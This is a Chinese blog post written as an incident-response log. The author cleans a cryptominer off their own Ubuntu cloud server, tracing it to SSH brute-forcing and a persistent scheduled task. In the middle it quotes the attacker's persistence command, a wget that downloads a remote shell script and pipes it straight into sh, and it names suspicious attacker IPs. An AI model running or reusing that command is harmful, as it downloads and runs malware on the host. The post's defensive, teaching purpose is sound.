文章首发于:https://forum.butian.net/share/859
写在前面
随着近几年安全行业的兴起,攻击者的攻击手法也大不相同,在不经意间自己的服务器就给别人攻击了,面对这些情况我们如何做出处理显得至关重要,在应急响应的过程中我们遇到的情况可能,有的时候可能踩坑,对每一次应急响应做出反思,那么在以后的工作中就可能少踩坑,效率也会提高,下面将介绍一次对自己服务器应急踩坑事件、进行深刻反思并扩展知识,请勿喷我的低级错误。
挖矿应急响应分析
突然手机收到一条短信,直接给我搞蒙了,我的服务器给日了?心里有点慌,马上登录服务器查看。
登录服务器首先做的就是将自己的重要东西备份了一波。然后查看一下自己的CPU既然是100%,肯定是遭到攻击了,猜想可能是挖矿。
查看网络连接状态,怎么有这么多IP
首先来解释一下每个IP的意思吧
正常IP
100.100.30.26的IP是阿里云盾的IP
117.26.48.99是自己连接阿里云的IP,看一下连接的是阿里云的22端口就知道(或者直接百度)
117.26.48.99、91.215.169.111、100.100.0.5这些都为保留IP
不正常IP
45.89.230.240、193.33.87.219这两个IP都为国外的IP,该IP非常可疑
先在威胁情报中心搜索一下异常IP吧
经过查询和CPU的利用率可以确定就是挖矿
威胁情报常见平台(根据域名、ip、文件定性)
奇安信威胁情报中心
https://ti.qianxin.com/
深信服威胁情报中⼼
https://sec.sangfor.com.cn/analysis-platform
微步在线
https://x.threatbook.cn/
venuseye
https://www.venuseye.com.cn/
安恒威胁情报中⼼
https://ti.dbappsecurity.com.cn/
360威胁情报中⼼
https://ti.360.cn/#/homepage
绿盟威胁情报中⼼
https://ti.nsfocus.com/
AlienVault
https://otx.alienvault.com/
RedQueen安全智能服务平台
https://redqueen.tj-un.com/IntelHome.html
IBM X-Force Exchange
https://exchange.xforce.ibmcloud.com/
ThreatMiner
https://www.threatminer.org/
Virustotal
https://www.virustotal.com/gui/home/upload
搜索上面威胁情报和进程中的关键词,发现两个进程都存在,直接使用kill关闭进程
再次查看网络连接情况,发现像外连接的IP消失了
查看CPU的情况此时恢复正常,太高兴了
接下来的操作就是寻找文件进行删除,使用find搜索文件,进行删除,还有那个/tmp挖矿文件也删除,这大概不需要多讲吧
应急处理完毕,但此时我需要思考的是到底是通过什么手段来上传至我的服务器的,首先排查的是否是通过爆破进来的,使用命令查看果真是
可通过grep命令查找文件里符合条件的字符串,定位有多少IP在爆破主机的 root 帐号:
grep "Failed password for root" /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -nr | more
查看Ubuntu下/var/log/auth.log的日志发现存在大量的爆破记录
使⽤lastb 来查看异常登录⽇志,发现有在28号的时候有人登录了,那段时间我并未登录,后面马上更改了自己的密码,并且翻了翻文件没有发现啥异常,问题解决了就没有去想了,去玩了。
第二天的时候我还是有点不放心,请原谅我的担忧,于是像师傅请教了一下有没有可以自动检测分析linux的工具。师傅介绍了一个GScan
下载地址:https://github.com/grayddq/GScan
全自动检测工具,由于忘记截图了,所以只能截取日志中保存的结果,发现没有居然存在反弹shell,有点慌了,不过处理方案已经给我们(这是多么一个致命的错误,既然别人一直在反弹shell,第二天才发现,要是是顾客估计被骂德不要不要的)
wget -q -O - http://185.191.32.198/unk.sh | sh把下载的内容输出到标准输出,但并不在屏幕显示,目的当然是直接传递给bash进行解析执行了
>/dev/null
这条命令的作用是将标准输出1重定向到/dev/null中。 /dev/null代表linux的空设备文件,所有往这个文件里面写入的内容都会丢失,俗称“黑洞”。那么执行了>/dev/null之后,标准输出就会不再存在,没有任何地方能够找到输出的内容。
2>&1
这条命令用到了重定向绑定,采用&可以将两个输出绑定在一起。这条命令的作用是错误输出将和标准输出同用一个文件描述符,说人话就是错误输出将会和标准输出输出到同一个地方。
马上寻找该文件,并且将任务删除
参考网上的资料查看了一下/etc/crontab文件中的内容,并未发现异常
使用GScan再次扫描,发现风险清除了,这里要注意风险2并非是攻击者造成的,而是我通过xshell连接的就会检测到
好比我打开两个终端那么它会检测出两个
在history中发现执行的命令
后面我也去查看了syslog日志信息,发现没有清除的时候一直都在请求下载,清除后没有进行下载了,这时的我变得更加细心,将所有日志大概翻了一遍,并且认真的观察了进程以及第三方应用,没有再发现问题,此时的应急响应结束。
终于算是清理完成了,来理清一下思路和反思一下自己这次的不足吧,当然并不像上面的那么顺利,其中也遇到了很多问题
欢迎大家关注红云谈安全公众号,不定期分享安全知识
596
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
